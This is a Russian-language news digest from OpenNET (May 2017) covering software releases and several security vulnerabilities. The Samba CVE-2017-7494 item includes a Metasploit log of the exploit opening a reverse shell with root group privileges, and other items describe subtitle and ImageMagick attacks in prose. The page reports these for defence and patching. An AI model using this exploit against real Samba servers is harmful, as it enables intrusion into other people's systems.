The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги ]

25.05.2017 Google и IBM представили Istio, платформу для управления микросервисами (11 +5)
  Компании Google, IBM и Lyft представили новый открытый проект Istio, в рамках которого объединили свои наработки в области координации работы микросервисов. О намерении принять участие в развитии проекта также объявили компании Red Hat, Datawire, Pivotal и Tigera. Код компонентов проекта написан на языках Go и C++, исходные тексты распространяются под лицензией Apache 2.0.

Концепция микросервисов подразумевает разбиение сложных монолитных приложений на набор обособленных микросервисов, каждый из которых берёт на себя определённую функциональность приложения. Микросервисы могут работать параллельно, адаптируясь к изменению нагрузки. Таким образом приложение реализуется в виде сети из связанных между собой микросервисов, каждый из которых запускается в отдельном контейнере. Для управления контейнерами предлагается использовать средства оркестровки, подобные Kubernetes, Cloud Foundry и Mesos.

Istio представляет собой слой абстракции, работающий поверх средств оркестровки контейнеров, и выполняет задачи по распределению нагрузки по микросервисам, организации аутентификации, разграничению доступа к микросервисам, защищённого взаимодействия между микросервисами, мониторинга и балансировки нагрузки. При помощи Istio набор запущенных в разных контейнерах микросервисов обретает слаженную функциональность и может работать как единое целое.

Основные составные части Istio:

  • Envoy - прокси для обработки входящего и исходящего трафика между сервисами в кластере, а также обращений к внешним сервисам. Envoy позволяет организовать взаимодействие между микросервисами, составляющими приложение, поверх сети, предоставляемой нижележащей платформой для управления контейнерами. Прокси образуют mesh-сеть из микросервисов, предоставляя такие функции, как обнаружение новых сервисов, маршрутизация потоков данных, построение цепочки обработки запроса и сбор данных телеметрии;
  • Mixer - представляет средства для централизованного управления прокси и микросервисами, обеспечивая применение ACL, ограничений пропускной способности, квот, аутентификации, трассировки запросов и накопления сведений о телеметрии.
  • Manager - управляющий интерфейс, позволяет на лету изменять настройки и управлять работой компонентов Envoy и Mixer.

Особенности платформы:

  • Автоматическая балансировка трафика HTTP, gRPC и TCP;
  • Тонкое управление поведением трафика в зависимости от правил маршрутизации, обеспечения отказоустойчивости и возникновения/симулирования сбоев;
  • Подключаемый слой для применения политик и API для управления доступом, ограничением пропускной способности и квотами;
  • Автоматический сбор метрик, логов и трассировок для всего входящего и исходящего трафика в кластере;
  • Организация защищённых каналов связи между сервисами с аутентификацией каждого сервиса в кластере.

В отличие от недавно представленной похожей платформы Linkerd, Istio не ограничивается организацией сетевого взавимодействия и дополнительно предоставляет такие возможности, как аутентификация и обеспечение правил доступа (policy control). При этом Istio пока поддерживает только Kubernetes, в то время как Linkerd доступен для Kubernetes, DC/OS, Mesos и Docker.

  1. OpenNews: Компания IBM открыла исходные тексты операционной системы FusedOS
  2. OpenNews: Представлен Otto, инструментарий для создания микросервисов из изолированных приложений
  3. OpenNews: Intel представил Clear Linux с контейнерами приложений на базе виртуализации
  4. OpenNews: Выпуск MirageOS 2.5, платформы для запуска приложений поверх гипервизора
  5. OpenNews: OSv - новая открытая ОС, нацеленная на выполнение обособленных программ поверх гипервизора
Обсуждение (11 +5) | Тип: Программы |
24.05.2017 Выпуск интегрированной среды разработки Qt Creator 4.3.0 (26 +8)
  Представлен выпуск интегрированной среды разработки Qt Creator 4.3.0, предназначенной для создания кроссплатформенных приложений с использованием библиотеки Qt. Поддерживается разработка как классических программ на языке C++, так и использование языка QML, в котором для определения сценариев используется JavaScript, а структура и параметры элементов интерфейса задаются CSS-подобными блоками.

В новой версии:

  • В визуальный проектировщик интерфейса Qt Quick Designer интегрирован редактор кода, который позволяет изменять код одновременно с изменением свойств и навигацией по дереву элементов. В том числе на одном экране можно разместить визуальный и текстовый редакторы, непосредственно наблюдая как сказываются на интерфейсе вносимые в код изменения и, наоборот, как меняется код при манипуляциях в графическом построителе интерфейса.

    В Qt Quick Designer также представлена новая панель инструментов. Реализована поддержка стиля кнопок Qt Quick Controls 2, возможность чтения информации о стилях из файла конфигурации qtquickcontrols2.conf и поддержка смены стилей Qt Quick Controls 2 на лету для оценки изменения интерфейса при выборе разных стилей. Упрощены манипуляции с вкладками и стековыми элементами при визуальном построении интерфейса. Добавлена функция перемещения компонента в отдельный файл.

  • При использовании сборочной системы CMake 3.7+, для взаимодействия с IDE теперь применяется серверный режим CMake, который предоставляет больше информации о структуре проекта и путях размещения заголовочных файлов, не требуя разбора генераторов и файлов Makefile. Применение серверного режима работы с CMake позволяет просматривать в дереве проекта отдельные продукты и сборочные цели, а также собирать их по отдельности. Из других изменений в поддержке CMake отмечается добавление заголовочных файлов в дерево проекта, даже если они явно не упоминаются в файлах проекта, и возможность импорта уже осуществлённых сборок, используя сведения из кэша CMake;
  • В редакторе кода на языке C++ добавлена поддержка контекстов редактирования, позволяющих определить проекты и языки программирования, которые следует применять для файла, в случае его применения в нескольких проектах или использования в нём языка C вместо C++. Разработчикам на C++ также предлагается оценить экспериментальный плагин ClangRefactoring, обеспечивающий начальную поддержку clang-query в диалоге поиска и возможность задействования средств Clang для локального переименования;
  • Для взаимодействие с отладчиком CDB, применяемым для кода MSVC, теперь используется бэкенд на языке Python, в котором задействованы те же методы вывода кода, что и в бэкендах для GDB и LLDB;
  • Решены проблемы при работе с проектами для платформы Android, вызванные изменениями в Android SDK 25.3.1;
  • В QML Profiler при профилировании приложений Qt Quick обеспечен вывод информации о производительности непосредственно в интерфейсе редактора кода QML. В QML Profiler также проведена оптимизация производительности и устранены мелкие недоработки в интерфейсе.

  1. OpenNews: Проект Qt опубликовал сборочный инструментарий qbs 1.7
  2. OpenNews: Рабочий стол Budgie переходит с GTK+ и библиотек GNOME на Qt
  3. OpenNews: Релиз фреймворка Qt 5.8
  4. OpenNews: Выпуск Qt 5.7.1 и интегрированной среды разработки Qt Creator 4.2
  5. OpenNews: Релиз системы сборки CMake 3.8
Обсуждение (26 +8) | Тип: Программы |
24.05.2017 Уязвимость в Samba, позволяющая выполнить код на сервере (24 +8)
  Опубликованы корректирующие обновления Samba 4.6.4, 4.5.10 и 4.4.14, в которых устранена критическая уязвимость (CVE-2017-7494), позволяющая организовать выполнение кода на сервере при наличии доступа на запись в предоставляемое сервером хранилище. Уязвимость позволяет клиенту загрузить разделяемую библиотеку на SMB-хранилище и инициировать её загрузку сервером. Проблема вызвана ошибкой в реализации IPC для именованных каналов для клиентов Windows NT.

Уязвимости подвержены все версии Samba, начиная с 3.5.0, поэтому дополнительно подготовлены патчи для старых версий. В качестве обходного пути защиты можно добавить в параметр "nt pipe support = no" в секцию "[global]" smb.conf и перезапустить smbd. Обновления пакетов уже сформированы для FreeBSD, Debian, Fedora и RHEL. Проследить за выпуском обновлений пакетов в других дистрибутивах можно на данных страницах: Ubuntu, openSUSE, SUSE, CentOS.

Дополнение: Подготовлен прототип эксплоита, позволяющий выполнить код с правами smbd (обычно root) при наличии доступа на запись в хранилище. Администраторам Samba-серверов рекомендуется не затягивать с установкой обновления, так как вероятно появление поддержки данного эксплоита во вредоносном ПО, поражающем локальные сети (например, машина неквалифицированного пользователя может быть взломана через уязвимость в браузере, PDF-просмотрщике или запуск пришедшего по почте троянского ПО, после чего через эту систему может быть атакован внутренний Samba-сервер).


   msf exploit(is_known_pipename) > exploit 

   [*] Started reverse TCP handler on 192.168.0.3:4444 
   [*] 192.168.0.3:445 - Using location \\192.168.0.3\yarp\h for the path
   [*] 192.168.0.3:445 - Payload is stored in //192.168.0.3/yarp/h as   GTithXJz.so
   [*] 192.168.0.3:445 - Trying location /tmp/yarp/h/GTithXJz.so...
   [*] Command shell session 6 opened (192.168.0.3:4444 -> 192.168.0.3:45076) at 2017-05-24 19:41:40 -0500

   id
   uid=65534(nobody) gid=0(root) groups=0(root),65534(nogroup)

  1. OpenNews: Обновление Samba 4.6.1, 4.5.7 и 4.4.12 с устранением уязвимости
  2. OpenNews: Выпуск Samba 4.6.0
  3. OpenNews: Уязвимость в Samba 4, которая может привести к удалённому выполнению кода
  4. OpenNews: Обновление Samba 4.4.5, 4.3.11 и 4.2.14 с устранением уязвимости
  5. OpenNews: Раскрыты детали уязвимости Badlock в Samba
Обсуждение (24 +8) | Тип: Проблемы безопасности |
24.05.2017 Атака на Kodi, VLC и Popcorn-Time через вредоносные субтитры (39 +7)
  В популярных открытых мультимедийных проигрывателях и медиацентрах, включая VLC, Kodi (XBMC), Popcorn-Time и strem.io, выявлена уязвимость, позволяющая получить контроль за окружением пользователя при обработке специально оформленных субтитров. Проблема устранена в Kodi 17.2, Popcorn-Time 0.3.10, strem.io 3.6.5 и VLC 2.2.5.1 (частично, полное исправление ожидается в версии 2.2.6). До установки обновления с устранением проблемы пользователям рекомендуется воздержаться от загрузки непроверенных субтитров из публичных сервисов, таких как OpenSubtitles.org.

Технические детали о методе атаки не публикуются, чтобы дать пользователям время на обновление, но судя по принятому в Kodi 17.2 патчу, проблема вызвана отсутствием экранирования символов ".." в файловых путях zip-архива с субтитрами. Атакующий может подготовить специально оформленный zip-архив, при распаковке которого может быть переписан любой файл в системе в рамках прав доступа текущего процесса с медиаплеером. Кроме того, в Popcorn-Time, судя по всему, устранена другая уязвимость, связанная с возможностью подстановки JavaScript-кода (межсайтовый скриптинг) в состав субтитров в формате SRT, который будет обработан в контексте JavaScript-движка, применяемого для построения интерфейса приложения. В VLC уязвимости вызваны переполнениями буфера в обработчике субтитров.

  1. OpenNews: Popcorn Time, система для потокового просмотра видео через BitTorrent
Обсуждение (39 +7) | Тип: Проблемы безопасности |
24.05.2017 В Linux обеспечена возможность устранения уязвимости MouseJack в устройствах Logitech (32 +22)
  Ричард Хьюз (Richard Hughes), создатель проекта PackageKit, активно участвующий в разработке Fedora и GNOME, реализовал для Linux инструмент для обновления прошивок беспроводных мышей, подверженных атаке MouseJack. Несмотря на то, что атака MouseJack была разработана более года назад, некоторые производители до сих пор не выпустили инструментарий для обновления прошивки, который можно было бы использовать в Linux. В частности Logitech не относит Linux к числу официально поддерживаемых систем и не планирует выпускать исправления.

При этом MouseJack является достаточно опасной проблемой, позволяющей из-за отсутствия защиты протокола, используемого при обмене данными между компьютером и мышью, получить контроль над беспроводными мышами на расстоянии до ста метров и симулировать через них клавиатурный ввод (протокол поддерживает передачу сведений о нажатиях клавиш). Так как исправление поставляется только в виде exe-файла, Linux-пользователи подобных устройств вынуждены были искать систему с Windows, подключать к ней свою мышь и выполнять обновление прошивки. В случае использования ноутбуков со встроенными адаптерами беспроводных мышей требовалась загрузка Windows на данном ноутбуке.

Для решения возникшей проблемы Ричард адаптировал применяемый в Fedora инструментарий fwupd для установки в Linux обновлений прошивок, предоставляемых компанией Logitech для других платформ. Исправление в том числе может быть использовано для беспроводных мышей Amazon, Microsoft, Lenovo и Dell, которые выпускаются по контракту компанией Logitech под другими брендами. Изначально метод обновления был воссоздан на основе обратного инжиниринга пакета для загрузки обновления, поставляемого для платформы Windows. Но затем инженеры Logitech предоставили разработчику официальную документацию по организации доступа к внутреннему интерфейсу замены прошивки в ресиверах и подверженных проблеме периферийных компонентах.

На основании данной документации в fwupd была добавлена полноценная поддержка смены прошивок в оборудовании Logitech. Для обновления прошивки в Fedora теперь достаточно обновить пакет fwupd до версии 0.9.2-2.fc26, активировать тестовый канал доставки обновлений (параметр DownloadURI) в файле конфигурации /etc/fwupd.conf и запустить команду "fwupdmgr refresh && fwupdmgr", вызвать GNOME Software или выполнить перезапуск сервиса.

  1. OpenNews: Уязвимость MouseJack позволяет получить контроль над системами, использующими беспроводные мыши
  2. OpenNews: Компания Dell подключилась к инициативе доставки обновлений прошивок для Linux
  3. OpenNews: Новый вид атак с использованием перепрограммированных USB-устройств
  4. OpenNews: Открыт код инструментария для проведения атак через модификацию прошивок USB-накопителей
  5. OpenNews: Атака на заблокированный ПК через USB
Обсуждение (32 +22) | Тип: К сведению |
23.05.2017 Стабильный выпуск СУБД MariaDB 10.2 (24 +19)
  После полутора лет разработки и пяти предварительных выпусков сформирован первый стабильный релиз новой ветки СУБД MariaDB 10.2, в рамках которой развивается ответвление от MySQL, сохраняющее обратную совместимость и отличающееся интеграцией дополнительных движков хранения и расширенных возможностей. Развитие MariaDB курирует независимая организация MariaDB Foundation в соответствии с полностью открытым и прозрачным процессом разработки, не зависящим от отдельных вендоров. MariaDB поставляется вместо MySQL во многих дистрибутивах Linux (RHEL 7, SUSE 12, Fedora, openSUSE, Slackware, OpenMandriva, ROSA, Arch Linux, Debian 9) и внедрён в таких крупных проектах, как Wikipedia, Google Cloud SQL и Nimbuzz.

Ключевые улучшения MariaDB 10.2:

  • Добавлена экспериментальная поддержка движка хранения MyRocks, разработанного Facebook на базе системы хранения RocksDB, оптимизированной для Flash-накопителей. В хранилище MyRocks применяются страницы данных плавающего размера, позволяющие избежать выравнивания по фиксированной границе блока, и модель хранения данных в форме лога (Log Structured Merge Trees), допускающая только дополнение (чистка производится сборщиком мусора). В процессе выполнение запросов в несколько раз сокращается число операций случайного чтения/записи, что приводит к увеличению производительности по сравнению с InnoDB на 20-30% на SDD и до 6 раз на НЖМД при нагрузке с большим числом операций случайной записи. Кроме того, MyRocks позволяет на 50% сократить размер БД по сравнению со сжатым хранилищем InnoDB и в 3.5 раза по сравнению с InnoDB без применения сжатия. Из недостатков MyRocks можно отметить отсутствие поддержки внешних ключей и полнотекстовых индексов;
  • Добавлена поддержка оконных функций, задаваемых ключевым словом OVER и позволяющих совершить вычисление над набором строк, связанных с текущей строкой. По аналогии с агрегатными функциями оконные функции позволяют обратиться к другим строкам в процессе обработки результата запроса, но в отличие от агрегатных функций они не группируют результат в одну строку;
  • Поддержка общих табличных выражений (выражение "WITH") и рекурсивных общих табличных выражений ("WITH RECURSIVE"). Секцию WITH можно использовать для определения подзапросов как локальных временных таблиц, на которые можно много раз ссылаться в запросе. "WITH RECURSIVE" позволяет обращаться к собственному результату, например, можно организовать обход дерева в процессе выполнении запроса;
  • Добавлено выражение "CONSTRAINT... CHECK" в блоке "CREATE TABLE" для задания ограничений столбца;
  • Реализована возможность указания выражений в блоке DEFAULT, например "b int DEFAULT (a+1)". Обеспечена поддержка указания значений DEFAULT для полей BLOB и TEXT;
  • Хранилище InnoDB обновлено до выпуска из состава MySQL 5.7.18 и задействовано по умолчанию (ранее по умолчанию предлагалось ответвление от InnoDB - XtraDB, смысл использования которого потерялся после того, как в InnoDB реализовали большинство основных возможностей XtraDB). В InnoDB добавлена поддержка пространственных индексов (spatial index);
  • Добавлено выражение "SHOW CREATE USER", показывающее полное выражение "CREATE USER", использованное для создания указанного пользователя;
  • Для выражения "CREATE USER" реализованы опции для ограничения потребления ресурсов и настройки tls/ssl. Например, теперь можно ограничить максимальное число запросов или соединений в час;
  • Представлено новое выражение "ALTER USER", позволяющее внести изменения в учётную запись существующего пользователя;
  • Сняты многие ограничения для виртуально вычисляемых столбцов;
  • Добавлена поддержка выражения "EXECUTE IMMEDIATE" для запуска динамического SQL-выражения, созданного на лету;
  • В оператор PREPARE добавлена возможность использования большинства выражений;
  • Добавлены функции для работы с данными в формате JSON;
  • Добавлен плагин аутентификации, использующий алгоритм ed25519 для хранения паролей;
  • В состав сборок для Windows, CentOS, RHEL и Fedora добавлен плагин для расшифровки ключей, используемых в Amazon Web Services (AWS) Key Management Service (KMS), для их последующего использования для шифрования данных в БД;
  • Появилась возможность привязки нескольких разных триггеров к одному событию;
  • Добавлена поддержка отложенной репликации, при которой состояние slave-сервера на заданный промежуток времени отстаёт от master-сервера;
  • Переработана реализация выражения ANALYZE TABLE, которое теперь не блокирует таблицу во время сбора статистики;
  • Библиотека wsrep, используемая для организации синхронной multi-master (active-active) репликации Galera, обновлена до выпуска 25.3.20;
  • Обеспечено формирование пакетов для Ubuntu 17.04;
  • В mysqldump добавлена опция "--add-drop-trigger", воспроизводящая функциональность MySQL 5.6 по добавлению в SQL-дамп выражения для удаления триггера перед его созданием;
  • Добавлен скрипт mysqlbinlog для организации непрерывного бэкапа бинарного лога. Скрипт поддерживает режим flashback, при помощи которого можно откатить состояние БД или отдельной таблицы на ранее созданный снапшот;
  • Сокращено время установки соединений за счёт выноса создания дескриптора соединений (THD) в отдельную нить и увеличения эффективности кэширования. В некоторых случаях ускорение может достигать 85%;
  • Добавлена поддержка OpenSSL 1.1 и LibreSSL;
  • Добавлены переменные innodb_deadlock_detect и innodb_stats_include_delete_marked для отключения система определения взаимных блокировок и учёта записей, помеченных как удалённые, при расчёте статистики;
  • Добавлена переменная read_binlog_speed_limit, задающая ограничение скорости с которой slave-сервер читает бинарный лог master-сервера;
  • Удалена старая клиентская библиотека, поставляемая под лицензией GPL, на смену которой пришла новая библиотека, имеющая лицензию LGPL.

  1. OpenNews: Компания MariaDB представила прокси-сервер MaxScale 2.0
  2. OpenNews: Стабильный выпуск СУБД MariaDB 10.1
  3. OpenNews: Компания Oracle анонсировала стабильный релиз MySQL 5.7
  4. OpenNews: Стабильный выпуск MariaDB Galera Cluster 10
  5. OpenNews: Стабильный выпуск СУБД MariaDB 10.0
Обсуждение (24 +19) | Тип: Программы | Интересно
23.05.2017 Уязвимость в ImageMagick, позволившая получить доступ к чужим вложениям в почте Yahoo (18 +11)
  Крис Эванс (Chris Evans), известный эксперт по компьютерной безопасности и автор защищенного FTP-сервера vsftpd, опубликовал сведения о новой уязвимости (CVE-2017-9098, кодовое имя "Yahoobleed1") в пакете ImageMagick, который часто используется web-разработчиками для преобразования изображений. Примечательно, что в GraphicsMagick, ответвлении от ImageMagick, уязвимость была устранена ещё в марте 2016 года, но из-за отсутствия скоординированных действий по устранению уязвимостей в обоих проектах проблема осталась неисправленной в ImageMagick.

Проблема присутствует в декодере RLE, который использует неинициализированные блоки памяти, что позволяет атакующему получить доступ к информации, оставшейся от других обработчиков в данном процессе. Наиболее интересным моментом стала разработка практического метода атаки на основе данной проблемы. Крис Эванс показал, что уязвимость можно использовать для атаки на сервис Yahoo Mail для получения доступа к вложениям чужих писем через отправку письма со специально оформленной картинкой во вложении.

При организации предпросмотра вложений Yahoo применяет постоянно запущенный обработчик, который использует ImageMagick для обработки изображений, что позволяет через эксплуатацию рассматриваемой уязвимости получить доступ к данным, оставшимся от обработки вложений других пользователей. В частности, Крис отправил себе письмо со специально оформленным 18-байтовым изображением, для предпросмотра которого через web-интерфейс было сформировано JPEG-изображение 1024x1024, состоящее из данных, остающихся в памяти после обработки вложений других пользователей.

Проблема устранена в ImageMagick 7.0.5-2 и GraphicsMagick 1.3.24. Обновления в дистрибутивах ещё не выпущены, проследить за их появлением можно на данных страницах: Debian, SUSE/openSUSE, RHEL, Fedora, Ubuntu, FreeBSD. Следует отметить, что проблема представляет опасность только в длительно работающих процессах, циклично обрабатывающих запросы.

Кроме того, Крис Эванс разработал ещё одну технику атаки на Yahoo Mail, назвав её "Yahoobleed2". Атака основана на уязвимости, исправленной ещё в январе 2015 года, но оставшейся неустранённой в варианте пакета ImageMagick, применяемом в Yahoo. Атака также выполняется через предпросмотр специально оформленного вложения и позволяет получить содержимое браузерных cookies, токенов аутентификации и частей изображений других пользователей Yahoo Mail. Компания Yahoo выплатила исследователю вознаграждение в размере 28 тысяч долларов (две премии по 14 тысяч) и приняла решение прекратить использование пакета ImageMagick в своих службах.

  1. OpenNews: В рамках проекта ImageFlow началось развитие высокопроизводительной альтернативы ImageMagick
  2. OpenNews: Новая критическая уязвимость в GraphicsMagick и ImageMagick
  3. OpenNews: Разработчики GraphicsMagick проанализировали подверженность уязвимостям ImageMagick
  4. OpenNews: Критическая уязвимость в пакете ImageMagick, используемом на многих сайтах
  5. OpenNews: Угроза безопасности из-за автоматической обработки мультимедийных файлов
Обсуждение (18 +11) | Тип: Проблемы безопасности |
23.05.2017 Релиз облачного хранилища Nextcloud 12, форка ownCloud (31 +12)
  После пяти месяцев разработки представлен выпуск облачной платформы Nextcloud 12, развивающейся как форк проекта ownCloud, созданный основными разработчиками данной системы. Nextcloud и ownCloud позволяют на своих серверных системах развернуть полноценное облачное хранилище с поддержкой синхронизации и обмена данными. Ключевым отличием Nextcloud от ownCloud является намерение предоставить в едином открытом продукте все расширенные возможности, ранее поставляемые только в коммерческой версии ownCloud. Исходные тексты Nextcloud, как и ownCloud, распространяются под лицензией AGPL.

Nextcloud предоставляет средства для обеспечения совместного доступа, версионный контроль изменений, поддержку воспроизведения медиаконтента и просмотра документов прямо из web-интерфейса, возможность синхронизации данных между разными машинами, возможность просмотра и редактирования данных с любого устройства в любой точке сети. Доступ к данным может быть организован как при помощи web-интерфейса, так и с использованием протокола WebDAV и его расширений CardDAV и CalDAV. В отличие от сервисов Google Drive, Dropbox, Яндекс.Диск и box.net, проекты ownCloud и Nextcloud дают пользователю полный контроль над своими данными - информация не привязывается ко внешним закрытым облачным системам хранения, а размещается на подконтрольном пользователю оборудовании. Сервер ownCloud можно развернуть на любом хостинге, поддерживающем выполнение PHP-скриптов и предоставляющем доступ к SQLite, MySQL или PostgreSQL.

Основные новшества Nextcloud 12:

  • Расширены средства для построения объединённых систем (Federation): пользователь может отслеживать изменения совместных ресурсов на других серверах через свой журнал действий. Обмен данными производится через новый ActivityPub API, реализованный в рамках инициативы Global Scale, нацеленной на создание на базе Nextcloud полноценной платформы для создания распределённых хранилищ, работа которых обеспечивается серией разных серверов. В будущем планируется предоставить средства для объединения разрозненных серверов Nextcloud в связанную сеть, способную масштабироваться до систем, способных обслужить миллионы пользователей.

    В рамках отдельных компонентов развиваются Lookup Server и Global Site Selector (GSS). Lookup Server обеспечивает хранение информации о физическом местоположении пользователя и сопоставляет идентификаторы пользователей с идентификаторы связанных с ними совместных ресурсов, хранимых на разных серверах. Lookup Server также обеспечивает хранение расширенных метаданных о пользователях, таких как данные о квотах и ограничениях, класс пропускной способности сети, класс резервирования данных и т.п. GSS выступает в роли центрального звена, запрашиваемого при первом подключении пользователя. GSS выполняет аутентификацию, определяет узел, ответственный за хранение данных текущего пользователя и перенаправляет пользователя на выбранный узел. В дальнейшем пользователь взаимодействует только с привязанным к нему узлом.

  • Переработан web-интерфейс, центральным звеном которого теперь являются приложения, реализующие дополнительную функциональность. Приложения закрепляются на верхней панели и всегда доступны для вызова. В правой части верхней панели появилось новое меню для быстрого доступа к адресной книге, позволяющее инициировать вызов, начать чат или отправить сообщение нужному пользователю. Связь с пользователями также можно инициировать через клик на аватаре, который отображается рядом со всеми сообщениями, уведомлениями, комментариями и другой активностью пользователя;

  • В приложение с реализацией файлового менеджера добавлен упрощённый режим организации совместного доступа к каталогам и функция перемещения файлов через меню, не прибегая к перетаскиванию файлов мышью (drag&drop). Также появилась возможность отправки уникальной публично доступной ссылки на ресурс сразу нескольким пользователям, для каждого из которых можно настроить отдельные права доступа к ресурсу, установить пароль и ограничить время доступа.

  • Расширения возможности видеозвонков: Пользователи могут подключаться к видеовызовам из своего окружения Nextcloud и через защищённые каналы связи общаться с коллегами непосредственно через браузер. В процессе общения можно предоставить совместный доступ к документам и сохранять их в своём экземпляре Nextcloud. Также можно предоставить доступ к содержимому экрана;
  • Добавлена поддержка Push-уведомлений, позволяющих через web-интерфейс или мобильное приложение информировать пользователя о предоставлении доступа к новым ресурсам, публикации ответов на сообщения, появлении новых комментариев. Администраторы могут отправлять Push-уведомления из командной строки и интегрировать их поддержку в сторонние приложения;

  • Добавлена возможность открытия доступа на запись к отдельным файлам, что позволяет, например, опубликовать ссылку на документ и сразу начать его совместное редактирование через сервис Collabora Online;
  • В состав включено новое приложение Circles с реализацией простой приватной социальной сети. При помощи данного приложения пользователи могут создавать свои группы и обмениваться файлами в этих группах. При помощи приложения Social Sharing можно обмениваться информацией с другими социальными сетями, например, публиковать ссылки в Twitter, Facebook, Google+ и Diaspora;
  • Для общения между пользователями предложено приложение Chat, поддерживающее протокол XMPP и способное загружать истории переписки с внешних XMPP-серверов;
  • Представлена порция приложений для администраторов:
    • Global Shares - для создания структуры совместно используемых каталогов для разных групп пользователей;
    • Guest - для предоставления временного доступа сторонних пользователей к определённым данным;
    • Excludedirs - для исключения заданного списка каталогов из индексации и видимости для пользователей. Например, при помощи данного приложения можно скрыть подкаталоги со снапшотами;
    • Quota Warning - для вывода предупреждений о приближении к исчерпанию дисковой квоты;
    • JSloader - позволяет администраторы добавить любой JavaScript-код на все страницы Nextcloud (например, можно добавить счётчик и код web-аналитики);
    • Impersonate - при помощи данного приложения администратор может войти в систему под любым другим пользователем для диагностики возникшей у данного пользователя проблемы;
    • Backup - для создания резервных копий.


  • Добавлена защита от подбора паролей (Brute Force Protection) и проведения атак через формы восстановления забытого пароля;
  • Реализованы средства для ограничения интенсивности запросов (Rate Limit), позволяющие задать лимит в число обращений за определённый период времени для диапазона IP или отдельных пользователей;
  • Добавлена поддержка расширенных схем аутентификации, например, теперь можно использовать OpenID, OAuth 2.0, Kerberos и двухфакторную аутентификацию;
  • Запущена инициатива по выплате денежных вознаграждений за выявление уязвимостей в Nextcloud. Разработчики готовы выплатить до $5000 за сведения о новых уязвимостях и отреагировать на проблему в течение 8 часов.


  1. OpenNews: Выпуск облачного хранилища Nextcloud 11, форка ownCloud
  2. OpenNews: Выпуск облачного хранилища Nextcloud 10, форка ownCloud
  3. OpenNews: Первый выпуск облачного хранилища Nextcloud, форка ownCloud
  4. OpenNews: Компания ownCloud отреагировала на создание форка
  5. OpenNews: Основатель и ключевые разработчики ownCloud создали форк проекта
Обсуждение (31 +12) | Тип: Программы |
23.05.2017 Выпуск SANE 1.0.27 с поддержкой новых моделей сканеров (20 +18)
  После полутора лет разработки сформирован релиз пакета sane-backends 1.0.27, в который входит набор драйверов, утилита командной строки scanimage, демон для организации сканирования по сети saned и библиотеки с реализацией SANE-API. Выпуск SANE 1.0.26 был пропущен, версия 1.0.27 вышла следом за 1.0.25. Пакетом поддерживается 1547 моделей сканеров, из которых 695 имеют статус полной поддержки всех функций, для 716 уровень поддержки оценен как хороший, для 113 - приемлемый, а для 23 - минимальный. Дополнительно для 404 устройств имеется не до конца протестированная реализация драйверов. Нереализованной остается поддержка 487 сканеров.

В новой версии представлены следующие улучшения:

  • Добавлена поддержка 32 новых моделей сканеров и МФУ, в том числе: Canon P-150M, PIXMA MG5700, MG6800, MG6900 и MG7700, Fujitsu fi-74x0 и fi-7030;
  • Внесены существенные улучшения в бэкенды canon_dr, epjitsu, epsonds, fujitsu, genesys, hp3500, pixma и xerox-mfp;
  • По умолчанию для работы с устройствами, подключаемыми через USB, задействована библиотека libusb-1.0. Сборка с libusb-0.1 теперь производится только, если в системе отсутствует libusb-1.0. Сборочные флаги "--enable-libusb*" отныне игнорируются, а для управления поддержкой USB следует использовать флаги "--with-usb" и "--without-usb";
  • Кодовая база переведена с использования стандарта C90 на C99;
  • Обновлён код для обхода проблем с USB 3.0 на платформе Linux. Данный код теперь по умолчанию не активен и требует явного включения через переменную окружения "SANE_USB_WORKAROUND=1", которую можно выставить в ситуации возникновения проблем с доступом к сканеру;
  • Исправлена большая порция ошибок, связанных с Avahi, многопоточной работой, USB, ICC/PNG/JPEG и т.п.;
  • Проведена работа по сокращению числа предупреждений компиляторов и повышению качества кода;
  • Добавлена поддержка операционной системы DragonFly BSD.

  1. OpenNews: Выпуск SANE 1.0.25 с поддержкой 300 новых моделей сканеров
  2. OpenNews: Выпуск SANE 1.0.24 с поддержкой 50 новых моделей сканеров
  3. OpenNews: Релиз SANE 1.0.23 с поддержкой 30 новых моделей сканеров
  4. OpenNews: Релиз SANE 1.0.22 с поддержкой 80 новых моделей сканеров
  5. OpenNews: Релиз SANE 1.0.21 с поддержкой более двухсот новых сканеров
Обсуждение (20 +18) | Тип: Программы |
22.05.2017 Опубликован пакетный менеджер GNU Guix 0.13 и дистрибутив GuixSD на его основе (45 +6)
  Проект GNU представил выпуск пакетного менеджера GNU Guix 0.13 и построенного на его основе дистрибутива GNU/Linux - GuixSD (Guix System Distribution). Допускается установка как в качестве обособленной ОС в системах виртуализации и на обычном оборудовании, так и запуск в уже установленных типовых окружениях GNU/Linux. Для загрузки сформированы образы для установки на USB Flash и использования в QEMU (156 Мб). Поддерживается работа на архитектурах i686, x86_64, armv7, aarch64 и mips64el.

Пакетный менеджер GNU Guix основан на наработках проекта Nix и кроме типичных функций управления пакетами поддерживает такие возможности, как выполнение транзакционных обновлений, возможность отката обновлений, работа без получения привилегий суперпользователя, поддержка привязанных к отдельным пользователям профилей, возможность одновременной установки нескольких версий одной программы, средства уборки мусора (выявление и удаление неиспользуемых версий пакетов). Для определения сценариев сборки приложений и правил формирования пакетов предлагается использовать специализированный высокоуровневый предметно-ориентированный язык и компоненты Guile Scheme API, позволяющие выполнять все операции по управлению пакетами на функциональном языке программирования Scheme.

Поддерживается возможность использования пакетов, подготовленных для пакетного менеджера Nix и размещённых в репозитории Nixpkgs. Кроме операций с пакетами возможно создание сценариев для управления конфигурацией приложений. При сборке пакета автоматически загружаются и собираются все связанные с ним зависимости. Возможна как загрузка готовых бинарных пакетов из репозитория, так и сборка из исходных текстов со всеми зависимостями. Реализованы средства для поддержания версий установленных программ в актуальном состоянии через организацию установки обновлений из внешнего репозитория.

Сборочное окружение для пакетов формируется в виде контейнера, содержащего все необходимые для работы приложений компоненты, что позволяет сформировать набор пакетов, способный работать без оглядки на состав базового системного окружения дистрибутива, в котором Guix используется в качестве надстройки. Между пакетами Guix возможно определение зависимостей, при этом для поиска наличия уже установленных зависимостей используется сканирование хэшей-идентификаторов в директории установленных пакетов. Пакеты устанавливаются в отдельное дерево директорий или поддиректорию в каталоге пользователя, что позволяет обеспечить его параллельное сосуществование с другими пакетными менеджерами и обеспечить поддержку широкого спектра существующих дистрибутивов. Например, пакет устанавливается как /nix/store/f42d69df5d8a0b526064a4e54a7c6f02-firefox-53.0.0/, где "f42d69..." является уникальным идентификатором пакета, используемым для контроля зависимостей.

